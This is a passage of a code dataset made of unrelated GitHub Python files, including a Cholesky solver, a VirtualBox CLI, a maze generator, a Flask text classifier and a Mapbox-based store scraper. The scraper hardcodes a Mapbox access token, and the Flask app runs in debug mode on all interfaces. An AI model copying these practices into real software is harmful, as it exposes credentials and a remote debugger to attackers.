\"\"\"\n Сохраняем базу данных в формате excel\n \"\"\"\n wb = Workbook()\n ws = wb.active\n row = 1\n for key, value in self.price_db.items():\n ws.cell(row=row, column=1, value=key)\n columns = 2\n for i in value:\n ws.cell(row=row, column=columns, value=i)\n columns += 1\n row += 1\n wb.save(filename=path_to_save)\n\n def delete_db(self):\n self.database.PriceParser.drop_table()\n","repo_name":"dmitrilay/Price_list_handler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41487021415","text":"from BluetoothController import BluetoothController\n\n\ndef process_message(msg, lock):\n with lock:\n print(msg)\n\n\nUUID = \"1e0ca4ea-299d-4335-93eb-27fcfe7fa849\"\nbt_controller = BluetoothController(uuid=UUID)\nbt_controller.connect_and_listen(callback=process_message)","repo_name":"schulbe/vanCTRL","sub_path":"raspi/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"31687211535","text":"import numpy as np\nfrom math import sqrt\n\ndef is_pos_def(x):\n return np.all(np.linalg.eigvals(x) > 0)\nsize=int(input(\"enter the size of matrix -->\"))\n\nmatrix=np.zeros((size,size))\n\nfor i in range (0,size):\n for j in range (0,size):\n print ('entry in row: ',i+1,' column: ',j+1)\n matrix[i][j] = int(input())\n \n\ndef cholesky(mtr,sze):\n\tmat=np.zeros((size,size))\n\tfor i in range(sze):\n\t\tfor j in range(i+1):\n\t\t\tsum_=0\n\t\t\tif j==i:\n\t\t\t\tfor k in range(j):\n\t\t\t\t\tsum_=sum_+(mat[j][k]**2)\n\t\t\t\tmat[j][j]= sqrt(mtr[j][j]-sum_)\n\t\t\telse:\n\t\t\t\tfor k in range(j):\n\t\t\t\t\tsum_=sum_+(mat[i][k] * mat[j][k])\n\t\t\t\tmat[i][j]=(mtr[i][j] - sum_)/mat[j][j]\n\treturn mat\nif is_pos_def(matrix):\n\tprint(\"lower triangular matrix is : \\n\")\n\tprint(cholesky(matrix,size))\n\tprint(\"tarnspose of lower triangular matrix is :\\n\")\n\tprint(cholesky(matrix,size).T)\t\t\t\t\t\t\t\nelse:\n\tprint(\"matrix is not positive defininte\\n\")\t","repo_name":"rangijayant15/Numerical_Analysis","sub_path":"cholesky.py","file_name":"cholesky.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31920698159","text":"from collections import defaultdict\nimport random\nfrom task import Task\nfrom solver import Solver\nimport numpy as np\n\n\nclass Grid(object):\n def __init__(self, env, params):\n self.env = env\n self.params = params\n # [x][y] = [object_type, smell, solver_smells]\n self.data = np.zeros((self.params.width, self.params.height, 3))\n self.tasks = {}\n self.solvers = []\n\n for _ in xrange(params.task_count):\n task = self.add_task()\n self.tasks[(task.x, task.y)] = task\n\n for _ in xrange(params.task_count / params.task_ratio):\n solver = self.add_solver()\n self.solvers.append(solver)\n\n def idle(self):\n while True:\n idle_time = random.randint(1, 10)\n yield self.env.timeout(idle_time)\n self.generate_task()\n\n def clear_task_at(self, x, y):\n self.task_at(x, y).clear()\n\n def task_at(self, x, y):\n return self.tasks[(x, y)]\n\n def generate_task(self):\n if random.random() < 0.5:\n self.add_task()\n\n def __find_empty_spot(self):\n x, y = None, None\n while True:\n x = random.randint(0, self.params.width - 1)\n y = random.randint(0, self.params.height - 1)\n if self.data[x, y, 0] == 0:\n break\n\n return (x, y)\n\n def add_task(self):\n x, y = self.__find_empty_spot()\n self.data[x, y, 0] = Task.id()\n return Task(self.env, x, y, self, self.params)\n\n def add_solver(self):\n x, y = self.__find_empty_spot()\n self.data[x, y, 0] = Solver.id()\n return Solver(self.env, x, y, self, self.params)\n","repo_name":"fanfilmu/agenty2016","sub_path":"tasksim/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74441377120","text":"from random import choice\r\nfrom math import sqrt\r\n\r\n# return number of cells around wall\r\ndef surroundingCells(maze, wall, cell_symbol):\r\n\tcounter = 0\r\n\tif (maze[wall[0]-1][wall[1]] == cell_symbol):\r\n\t\tcounter += 1\r\n\tif (maze[wall[0]+1][wall[1]] == cell_symbol):\r\n\t\tcounter += 1\r\n\tif (maze[wall[0]][wall[1]-1] == cell_symbol):\r\n\t\tcounter +=1\r\n\tif (maze[wall[0]][wall[1]+1] == cell_symbol):\r\n\t\tcounter += 1\r\n\treturn counter\r\n\r\n# make safe zone for player, guards must resp outside of the zone at start of level\r\ndef initial_guard_distance(player, guard):\r\n x = player[1] - guard[1]\r\n y = player[0] - guard[0]\r\n if (sqrt((x**2) + (y**2)) > 10):\r\n return True\r\n else: \r\n return False\r\n\r\n\r\n\r\n# convert maze to string and save to file\r\ndef save_generated_level(maze_list):\r\n\tstr_maze = \"\"\r\n\tfor line in maze_list:\r\n\t\tstr_maze += (''.join(line)) + '\\n'\r\n\r\n\twith open(\".\\content\\levels\\level_generated.txt\", 'w') as file:\r\n\t\tfile.write(str_maze[:-1])\r\n\r\n\r\ndef random_maze_generator(maze_size, guards, treasures):\r\n\t\r\n\theight=maze_size[0]\r\n\twidth=maze_size[1]\r\n\r\n\twall_symbol = 'X'\r\n\tcell_symbol = ' '\r\n\tunvisited_symbol = 'u'\r\n\r\n\tmaze, walls = [], []\r\n\r\n\t# mark all cells as unvisited\r\n\tfor i in range(0, height):\r\n\t\tline = []\r\n\t\tfor j in range(0, width):\r\n\t\t\tline.append(unvisited_symbol)\r\n\t\tmaze.append(line)\r\n\r\n\t# randomize initial point and set it a cell\r\n\tinitial_height = choice(range(1, height-2))\r\n\tinitial_width = choice(range(1, width-2))\r\n\tmaze[initial_height][initial_width] = cell_symbol\r\n\r\n\t# mark walls around initial cell \r\n\tmaze[initial_height-1][initial_width] = wall_symbol\r\n\tmaze[initial_height][initial_width - 1] = wall_symbol\r\n\tmaze[initial_height][initial_width + 1] = wall_symbol\r\n\tmaze[initial_height + 1][initial_width] = wall_symbol\r\n\r\n\t# add walls around initial cell to wall list\r\n\twalls.append([initial_height - 1, initial_width])\r\n\twalls.append([initial_height + 1, initial_width])\r\n\twalls.append([initial_height, initial_width - 1])\r\n\twalls.append([initial_height, initial_width + 1])\r\n\r\n\t# loop (building process of subsequent paths and walls)\r\n\twhile (walls):\r\n\t\twall = walls[(choice(range(0, len(walls))))]\r\n\r\n\t\t# check if chosen wall is not left border wall\r\n\t\tif (wall[1] != 0):\r\n\t\t\tif (maze[wall[0]][wall[1]-1] == unvisited_symbol and maze[wall[0]][wall[1]+1] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on top cell\r\n\t\t\t\t\tif (wall[0] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]-1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]-1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]-1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]-1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on bottom cell\r\n\t\t\t\t\tif (wall[0] != height-1):\r\n\t\t\t\t\t\tif (maze[wall[0]+1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]+1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]+1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]+1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on left cell\r\n\t\t\t\t\tif (wall[1] != 0):\t\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]-1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]-1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]-1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]-1])\r\n\r\n\r\n\t\t# check if chosen wall is not top border wall\r\n\t\tif (wall[0] != 0):\r\n\t\t\tif (maze[wall[0]-1][wall[1]] == unvisited_symbol and maze[wall[0]+1][wall[1]] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on top cell\r\n\t\t\t\t\tif (wall[0] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]-1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]-1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]-1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]-1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on left cell\r\n\t\t\t\t\tif (wall[1] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]-1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]-1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]-1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]-1])\r\n\r\n\t\t\t\t\t# make wall on right cell\r\n\t\t\t\t\tif (wall[1] != width-1):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]+1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]+1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]+1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]+1])\r\n\r\n\t\t# check if chosen wall is not bottom border wall\r\n\t\tif (wall[0] != height-1):\r\n\t\t\tif (maze[wall[0]+1][wall[1]] == unvisited_symbol and maze[wall[0]-1][wall[1]] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on bottom cell\r\n\t\t\t\t\tif (wall[0] != height-1):\r\n\t\t\t\t\t\tif (maze[wall[0]+1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]+1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]+1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]+1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on left cell\r\n\t\t\t\t\tif (wall[1] != 0):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]-1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]-1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]-1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]-1])\r\n\r\n\t\t\t\t\t# make wall on right cell\r\n\t\t\t\t\tif (wall[1] != width-1):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]+1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]+1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]+1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]+1])\r\n\r\n\t\t# check if chosen wall is not right border wall\r\n\t\tif (wall[1] != width-1):\r\n\t\t\tif (maze[wall[0]][wall[1]+1] == unvisited_symbol and maze[wall[0]][wall[1]-1] == cell_symbol):\r\n\t\t\t\tif (surroundingCells(maze, wall, cell_symbol) < 2):\r\n\t\t\t\t\t# make new cell\r\n\t\t\t\t\tmaze[wall[0]][wall[1]] = cell_symbol\r\n\r\n\t\t\t\t\t# make wall on right cell\r\n\t\t\t\t\tif (wall[1] != width-1):\r\n\t\t\t\t\t\tif (maze[wall[0]][wall[1]+1] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]][wall[1]+1] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0], wall[1]+1] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0], wall[1]+1])\r\n\r\n\t\t\t\t\t# make wall on top cell\r\n\t\t\t\t\tif (wall[0] != 0):\t\r\n\t\t\t\t\t\tif (maze[wall[0]-1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]-1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]-1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]-1, wall[1]])\r\n\r\n\t\t\t\t\t# make wall on bottom cell\r\n\t\t\t\t\tif (wall[0] != height-1):\r\n\t\t\t\t\t\tif (maze[wall[0]+1][wall[1]] != cell_symbol):\r\n\t\t\t\t\t\t\tmaze[wall[0]+1][wall[1]] = wall_symbol\r\n\t\t\t\t\t\tif ([wall[0]+1, wall[1]] not in walls):\r\n\t\t\t\t\t\t\twalls.append([wall[0]+1, wall[1]])\r\n\r\n\t\t# remove wall from list of walls\r\n\t\tfor w in walls:\r\n\t\t\tif (w[0] == wall[0] and w[1] == wall[1]):\r\n\t\t\t\twalls.remove(w)\r\n\t\t\r\n\t# mark remaining unvisited cells as walls\r\n\tfor i in range(0, height):\r\n\t\tfor j in range(0, width):\r\n\t\t\tif (maze[i][j] == unvisited_symbol):\r\n\t\t\t\tmaze[i][j] = wall_symbol\r\n\r\n\t# mark player starting position\r\n\tfor i in range(0, width):\r\n\t\tif (maze[1][i] == cell_symbol):\r\n\t\t\tmaze[1][i] = 'P'\r\n\t\t\tplayer_position = [1, i]\r\n\t\t\tbreak\r\n\r\n\t# mark level exit position\r\n\tfor i in range(width-1, 0, -1):\r\n\t\tif (maze[height-2][i] == cell_symbol):\r\n\t\t\tmaze[height-2][i] = 'E'\r\n\t\t\tbreak\r\n\r\n\t# mark random positions of guards, outside of starting safe zone\r\n\tguard=0\r\n\twhile guard in range(guards):\r\n\t\ty = choice(range(1, height-2))\r\n\t\tx = choice(range(1, width-2))\r\n\t\tif (maze[y][x] != wall_symbol):\r\n\t\t\tguard_position = [y, x]\r\n\t\t\tif initial_guard_distance(player_position, guard_position):\r\n\t\t\t\tmaze[y][x] = 'G'\r\n\t\t\t\tguard += 1\r\n\r\n\t# mark random positions of treasures\r\n\ttreasure=0\r\n\twhile treasure in range(treasures):\r\n\t\ty = choice(range(1, height-2))\r\n\t\tx = choice(range(1, width-2))\r\n\t\tif (maze[y][x] != wall_symbol):\r\n\t\t\tif ((maze[y-1][x] or maze[y+1][x] or maze[y][x-1] or maze[y][x+1]) != 'G'):\r\n\t\t\t\tmaze[y][x] = 'T'\r\n\t\t\t\ttreasure += 1\r\n\r\n\tsave_generated_level(maze)","repo_name":"bxartur/Maze-game","sub_path":"content/modules/level_generator.py","file_name":"level_generator.py","file_ext":"py","file_size_in_byte":7675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"8300929761","text":"from typing import List\n\nfrom triple_agent.reports.generation.generic_query import query\nfrom triple_agent.classes.game import Game\nfrom triple_agent.reports.generation.plot_specs import (\n AxisProperties,\n DataQueryProperties,\n initialize_properties,\n)\n\n_NOSTOP = \"NoStop\"\n_STOP = \"Stop\"\n\n\nNOSTOP_PLOT_ORDER = [_NOSTOP, _STOP]\n\n\ndef _categorize_stop_talks(games, data_dictionary):\n # This is only checking whether a stop talk occured in a game\n # Not counting whether each start talk has a corresponding stop.\n for game in games:\n did_stop = None\n for timeline_event in game.timeline:\n if timeline_event.event == \"stopped talking.\":\n did_stop = True\n break\n\n if did_stop is None:\n data_dictionary[_NOSTOP] += 1\n else:\n data_dictionary[_STOP] += 1\n\n\ndef stop_talk_in_game_percentage(\n games: List[Game],\n data_query: DataQueryProperties = DataQueryProperties(),\n axis_properties: AxisProperties = AxisProperties(),\n): # pragma: no cover\n axis_properties, data_query = initialize_properties(\n axis_properties,\n data_query,\n AxisProperties(\n primary_color_dict={\n _NOSTOP: axis_properties.plot_colors.color_1,\n _STOP: axis_properties.plot_colors.color_2,\n }\n ),\n DataQueryProperties(\n query_function=_categorize_stop_talks, primary_order=NOSTOP_PLOT_ORDER\n ),\n )\n\n return query(games, data_query, axis_properties)\n","repo_name":"andrewzwicky/TripleAgent","sub_path":"triple_agent/reports/specific/stop_talks.py","file_name":"stop_talks.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"28847031399","text":"import pandas as pd\nimport pickle\nimport warnings\nwarnings.filterwarnings('ignore')\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\n\nmodel_file_name = \"complaints_classifier.pkl\"\nmodel_path = \"../models/\"+model_file_name\n\napp = Flask(__name__)\n\n\ndef tokenize(text):\n tokens = word_tokenize(text)\n lemmatizer = WordNetLemmatizer()\n\n clean_tokens = []\n for tok in tokens:\n clean_tok = lemmatizer.lemmatize(tok).lower().strip()\n clean_tokens.append(clean_tok)\n\n return clean_tokens\n\n\n# load model\nprint(\"loading model {} ...\".format(model_path))\nmodel = pickle.load(open(model_path, 'rb'))\n\n\n# index webpage receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n # create the dictionary of Topic names and Topics\n topic_names = {0: \"Bank account services\",\n 1: \"Credit card / Prepaid card\",\n 2: \"Others\",\n 3: \"Theft/Dispute reporting\",\n 4: \"Mortgages/loans\"}\n\n # save user input in query\n query = request.args.get('query', '')\n\n # use model to predict classification for query\n print(\"generating classification prediction for message {}...\".format(query))\n classification_labels = model.predict([query])[0]\n classification_labels = topic_names[classification_labels]\n print(\"labels {}...\".format(classification_labels))\n # classification_results = dict(zip(df.columns[4:], classification_labels))\n\n # This will render the index.html Please see that file.\n return render_template(\n 'index.html',\n query=query,\n model=model[-1],\n classification_labels=classification_labels\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=8000, debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"fayolapeters/complaints","sub_path":"app/complaints.py","file_name":"complaints.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13969792850","text":"import csv\nimport re\n\nimport requests\nfrom data import data \n\ndef get_nearest_facilities(latitude, longitude, access_token, types, limit=3):\n base_url = \"https://api.mapbox.com/geocoding/v5/mapbox.places/\"\n coordinates = f\"{longitude},{latitude}.json\"\n endpoint = f\"{base_url}{coordinates}\"\n params = {\n \"access_token\": access_token,\n \"types\": types, \n \"limit\": limit\n }\n\n response = requests.get(endpoint, params=params)\n data = response.json()\n\n if response.status_code == 200:\n features = data.get(\"features\", [])\n results = []\n count = 0 \n for feature in features:\n place_name = feature.get(\"place_name\", \"\")\n \n if 'mix' not in place_name.lower():\n first_part = place_name.split(',')[0]\n results.append(first_part)\n count+=1\n print(\"placename \",count ,\" : \" , place_name )\n if count < 2 :\n results.append(\"newplace\")\n return results\n\n else:\n print(f\"Error: {response.status_code}, {data.get('message', 'Unknown error')}\")\n\n\n\nwith open('data_familymart.csv', 'w', newline='', encoding='utf-8') as csvfile:\n csv_writer = csv.writer(csvfile)\n\n csv_writer.writerow(['feature_name','feature_tag','Name','Address', 'Latitude','Longitude','Location','Nearest(poi)'])\n x=0\n for item in data:\n content = item['content']\n\n name_start = content.find('
') + 4\n name_end = content.find('<', name_start)\n name = content[name_start:name_end].strip()\n\n address_start = content.find('

') + 18\n address_end = content.find('

', address_start)\n full_address = content[address_start:address_end].replace('
', ' ').strip()\n\n # getlocation name\n\n\n # Check if the address contains \"Selangor\"\n if full_address:\n # if 'Selangor' in full_address:\n pattern = r'(?:.*?,){3}\\s*([^,]+)$'\n match = re.search(pattern, full_address)\n\n if match:\n result = match.group()\n city = [part.strip() for part in result.split(',')]\n x = len(city) - 2\n\n # print(city[x-1])\n lat = item['position']['lat']\n lng = item['position']['lng']\n\n mapbox_access_token = \"pk.eyJ1IjoicnllaSIsImEiOiJjbG52aHo5aWgwcGs3MnBucDBwd2Jud2VkIn0.yFjj-Nk5rVdbkGtIaBF84Q\"\n facility_types = \"poi,poi.landmark\" \n \n nearestpoi = get_nearest_facilities(lat, lng, mapbox_access_token, facility_types)\n\n state = city[len(city)-1]\n if ' ' in state :\n # print(state)\n newState = state.split()[-2]\n print(newState)\n \n\n csv_writer.writerow([\"familymart\",\"convenience_store\",f\"{name} @{city[x-1]}\", full_address, f\"{lat}\",f\"{lng}\",city[x-1],nearestpoi])\n x=x+1\n print(\"Total: \",x)\n","repo_name":"tuxuri/data-collection","sub_path":"webscrape-training-code/familymart/fmscraping.py","file_name":"fmscraping.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16181066996","text":"import virtualbox\r\nimport sys\r\n\r\nmessage = \"Create | Delete | Open | Close | Exit | Help \"\r\nprint(\"CLI is running\")\r\nprint(\"Please, select and type below your wanted option...\")\r\nprint(message)\r\n\r\n\r\ndef cli_action():\r\n\r\n vbox = virtualbox.VirtualBox()\r\n machines = vbox.machines\r\n\r\n command = input(\">: \")\r\n\r\n if command == \"Open\":\r\n print(\"Choose and type below on of the following existing machines...\")\r\n for machine in machines:\r\n print(machine.name)\r\n sel_machine = input(\">: \")\r\n print(sel_machine + \" is opening\")\r\n session = virtualbox.Session()\r\n machine = vbox.find_machine(sel_machine)\r\n # progress = machine.launch_vm_process(session, \"gui\", \"\")\r\n # For virtualbox API 6_1 and above (VirtualBox 6.1.2+), use the following:\r\n progress = machine.launch_vm_process(session, \"headless\", [])\r\n progress.wait_for_completion()\r\n print(sel_machine + \" is running... To close it, type y below \")\r\n command = input(\">: \")\r\n if command == \"y\":\r\n session.console.power_down()\r\n\r\n elif command == \"Create\":\r\n print(\"Choose below an OS to clone...\")\r\n for machine in machines:\r\n print(machine.name)\r\n sel_machine = input(\">: \")\r\n print(\"Choose a name for the new machine...\")\r\n sel_name = input(\">: \")\r\n print(sel_machine + \" is creating...\")\r\n machine_to_clone = vbox.find_machine(sel_machine)\r\n # session = virtualbox.Session()\r\n # progress = machine.launch_vm_process(session, \"gui\", [])\r\n # progress.wait_for_completion()\r\n # session.machine.take_snapshot(name=\"snapshot1\",description=\"For study matters\", pause=False)\r\n machine_to_clone.clone(name=sel_name)\r\n print(sel_name + \" is created!\")\r\n\r\n elif command == \"Delete\":\r\n print(\"Choose below an OS to remove...\")\r\n for machine in machines:\r\n print(machine.name)\r\n sel_machine = input(\">: \")\r\n print(sel_machine + \" is being deleted...\")\r\n machine_to_delete = vbox.find_machine(sel_machine)\r\n # session = virtualbox.Session()\r\n # progress = machine.launch_vm_process(session, \"gui\", [])\r\n # progress.wait_for_completion()\r\n # session.machine.take_snapshot(name=\"snapshot1\",description=\"For study matters\", pause=False)\r\n machine_to_delete.remove(delete=True)\r\n print(sel_machine + \" has been deleted...\")\r\n\r\n elif command == \"Exit\":\r\n sys.exit()\r\n\r\n elif command == \"Help\":\r\n print(\"Please, select and type below your wanted option...\")\r\n print(message)\r\n\r\n else:\r\n print(\"Oops! It seems like your input isn't valid! Please, enter it again!\")\r\n\r\n\r\nwhile True:\r\n try:\r\n cli_action()\r\n except:\r\n print('Oops... It looks that something goes wrong!')\r\n print('Please, note that commands and vm are case sensitive')\r\n print('For more info, type Help on command line')\r\n cli_action()\r\n","repo_name":"mariachi9999/virtualbox-CLI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72979197601","text":"from django.shortcuts import render, redirect\nimport json\nfrom django.http import JsonResponse\n\nfrom .models import Post, Comment\n\ndef postList(request,by):\n if by == \"all\":\n post_list = Post.objects.all().order_by(\"-created_at\")\n context = {\n \"post_list\" : post_list,\n }\n elif by == \"follow\":\n followings = request.user.followings.all()\n post_list = Post.objects.filter(author__in = followings).order_by(\"-created_at\")\n context = {\n \"post_list\" : post_list,\n }\n return render(request,\"main.html\",context)\n\ndef postDetail(request,id):\n post = Post.objects.get(id = id)\n context = {\n \"post\": post,\n }\n return render(request,\"content/content.html\",context)\n\ndef postSaved(request):\n post_list = request.user.saved_posts.all()\n context = {\n \"post_list\" : post_list,\n }\n return render(request,\"content/bucket.html\",context)\n\n\ndef postCreate(request):\n if request.method == \"POST\":\n post = Post(author = request.user,content = request.POST.get(\"content\"),image = request.FILES.get(\"image\"))\n post.save()\n return redirect(\"content:post_detail\",post.id)\n else:\n return render(request,\"content/post.html\")\n\ndef savePost(request):\n if request.method == \"POST\":\n data = json.loads(request.body)\n post = Post.objects.get(id = data[\"post_id\"])\n post.saved_user.add(request.user)\n post.save()\n return JsonResponse({\"saved\" : request.user.saved_posts.count()},status = 200)\n\ndef commentCreate(request,post_id):\n if request.method == \"POST\":\n post = Post.objects.get(id = post_id)\n comment = Comment(author = request.user,content = request.POST.get(\"content\"),post = post)\n comment.save()\n return redirect(\"content:post_detail\",post.id)\n\n","repo_name":"Jeeeyoungkim/cloud-programming","sub_path":"content/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72338787361","text":"from unittest.mock import patch, MagicMock\n\nimport pytest\nfrom algernon import ajson\n\nfrom toll_booth import handler\n\n\n@pytest.mark.tasks\n@pytest.mark.usefixtures('unit_environment')\nclass TestTasks:\n @pytest.mark.mark_push\n def test_mark_push_complete(self, mark_push_event, mock_context):\n with patch('toll_booth.tasks.mark_push.boto3.resource') as mock_dynamo:\n mock_resource = MagicMock()\n mock_table = MagicMock()\n mock_resource.Table = mock_table\n mock_dynamo.return_value = mock_resource\n event = {'task_name': 'mark_push_complete', 'task_kwargs': mark_push_event}\n results = handler(event, mock_context)\n assert results is None\n assert mock_table.update_item.called\n\n @pytest.mark.tasks_generate_source_vertex\n def test_generate_source_vertex(self, source_vertex_task_integration_event, mock_context, mocks):\n results = handler(source_vertex_task_integration_event, mock_context)\n assert results\n parsed_results = ajson.loads(results)\n expected_keys = ['source_vertex', 'schema', 'schema_entry', 'extracted_data']\n for key_value in expected_keys:\n assert key_value in parsed_results\n generated_vertex_data = parsed_results['source_vertex']\n assert generated_vertex_data.vertex_properties\n assert mocks['bullhorn'].called\n assert mocks['gql'].called\n\n @pytest.mark.tasks_generate_potential_connections\n def test_generate_potential_connections(self, potential_connections_unit_event, mock_context, mocks):\n results = handler(potential_connections_unit_event, mock_context)\n assert results\n assert mocks['bullhorn'].called\n\n @pytest.mark.tasks_check_for_existing_vertexes\n def test_check_for_existing_vertexes(self, find_existing_vertexes, mock_context, mocks):\n results = handler(find_existing_vertexes, mock_context)\n assert results\n assert mocks['bullhorn'].called\n\n @pytest.mark.tasks_generate_potential_edge\n def test_generate_potential_edge(self, generate_edge_integration_event, mock_context):\n results = handler(generate_edge_integration_event, mock_context)\n assert results\n","repo_name":"AlgernonSolutions/eventful_leech","sub_path":"tests/unit/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30534707812","text":"import sys\nimport time\nfrom threading import Thread\n\n\nclass ExceptionCatchingThread(Thread):\n \"\"\"\n The interface provided by ExceptionCatchingThread is identical to that of\n threading.Thread, however, if an exception occurs in the thread\n the error will be caught and printed to stderr.\n \"\"\"\n\n def __init__(self, **kwargs):\n super(ExceptionCatchingThread, self).__init__(**kwargs)\n self._real_run = self.run\n self.run = self._wrap_run\n\n def _wrap_run(self):\n try:\n self._real_run()\n except Exception as exc:\n print(exc, file=sys.stderr)\n\n\nclass RDSWaiter:\n \"\"\"\n Context manager that provides the waiting functionality when\n modifying/upgrading an RDSInstance\n\n >>> from models import rds_client\n >>> from moto import mock_rds2; mock_rds2().start()\n >>> from test_data.utils import make_rds_instance\n >>> make_rds_instance()\n RDSInstance id: test-rds-id, status: available, engine: postgres, engine_version: 9.3.14\n >>> with RDSWaiter(rds_client, \"test-rds-id\", \"9.4.18\", sleep_time=0):\n ... print(\"Upgrading soon!\")\n Polling: test-rds-id for availability\n Status of: test-rds-id is: available\n Upgrading soon!\n Upgrading test-rds-id to: 9.4.18\n Polling: test-rds-id for availability\n Status of: test-rds-id is: available\n Successfully upgraded test-rds-id to: 9.4.18\n \"\"\"\n\n def __init__(self, client, db_instance_id, pg_engine_version, sleep_time=60):\n self.engine_version = pg_engine_version\n self.instance_id = db_instance_id\n self.sleep_time = sleep_time\n self.client = client\n self.rds_waiter = self.client.get_waiter(\"db_instance_available\")\n\n _operation_method = self.rds_waiter._operation_method\n\n def wait_with_status_reporting(**kwargs):\n print(\"Polling: {} for availability\".format(self.instance_id))\n response = _operation_method(**kwargs)\n print(\n \"Status of: {} is: {}\".format(\n self.instance_id, response[\"DBInstances\"][0][\"DBInstanceStatus\"]\n )\n )\n return response\n\n self.rds_waiter._operation_method = wait_with_status_reporting\n\n def __enter__(self):\n self.rds_waiter.wait(DBInstanceIdentifier=self.instance_id)\n\n def __exit__(self, type, value, traceback):\n print(\"Upgrading {} to: {}\".format(self.instance_id, self.engine_version))\n time.sleep(self.sleep_time)\n 